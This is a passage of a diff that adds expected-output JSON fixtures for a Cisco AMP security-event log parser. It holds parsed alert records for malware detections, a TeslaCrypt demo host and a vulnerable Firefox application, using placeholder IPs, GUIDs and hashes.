"Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:27:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533671380737589308", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 605000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533671380737589000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 30074, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:26:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533671123039551547", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 81000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533671123039551000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "\\\\?\\C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 31393, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:26:37.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533671118744584249", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 666000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533671118744584000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 34036, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:25:37.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533670861046546488", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 293000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533670861046546000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "\\\\?\\C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 35355, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:25:36.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533670856751579190", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 880000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533670856751579000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 38000, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:24:58.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.3372C1EDAB-100.SBX.TG", + "cisco.amp.event_type_id": 1107296258, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 329000000, + "event.action": "Multiple Infected Files", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 1489955900329000200, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "event.start": "2021-01-15T10:24:58.000Z", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "input.type": "log", + "log.offset": 39319, + "process.hash.sha256": "9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad", + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:23:01.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533670191031648309", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 947000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533670191031648000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "\\\\?\\C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 40618, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:22:29.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.B1380FD95B-100.SBX.TG", + "cisco.amp.event_type_id": 1107296272, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 0, + "event.action": "Executed malware", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 15212386047828, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "event.start": "2021-01-15T10:22:29.000Z", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "file:///C%3A/ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "input.type": "log", + "log.offset": 44582, + "process.hash.sha256": "5ad3c37e6f2b9db3ee8b5aeedc474645de90c66e3d95f8620c48102f1eba4124", + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:22:00.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533669929038643250", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 973000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533669929038643000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "\\\\?\\C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 45938, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:21:00.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533669671340605487", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 333000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533669671340605000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "\\\\?\\C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 49902, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:20:59.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533669667045638188", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 779000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533669667045638000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 53873, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:20:00.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f5:8f:96:c3:53:1c" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296279, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.cve": [ + "CVE-2015-7204" + ], + "cisco.amp.related.mac": [ + "f5:8f:96:c3:53:1c" + ], + "cisco.amp.timestamp_nanoseconds": 0, + "cisco.amp.vulnerabilities": [ + { + "cve": "CVE-2015-7204", + "name": "Mozilla Firefox", + "score": "6.8", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7204", + "version": "41.0" + } + ], + "event.action": "Vulnerable Application Detected", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 15210587194928, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 1, + "event.start": "2021-01-15T10:20:00.000Z", + "file.hash.sha256": "4312cdb2ead8fd8d2dd6d8d716f3b6e9717b3d7167a2a0495e4391312102170f", + "file.name": "firefox.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Exploit_Prevention", + "host.name": "Demo_AMP_Exploit_Prevention", + "input.type": "log", + "log.offset": 55192, + "process.hash.sha256": "0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894", + "related.hash": [ + "4312cdb2ead8fd8d2dd6d8d716f3b6e9717b3d7167a2a0495e4391312102170f" + ], + "related.hosts": [ + "Demo_AMP_Exploit_Prevention" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:19:59.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533669409347600427", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 257000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533669409347600000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "\\\\?\\C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 56650, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:19:58.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533669405052633129", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 847000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533669405052633000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 59295, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:18:58.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533669147354595368", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 375000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533669147354595000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "\\\\?\\C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 60614, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:18:57.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533669143059628070", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 968000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533669143059628000, + "event.kind": "alert", + "event.module": 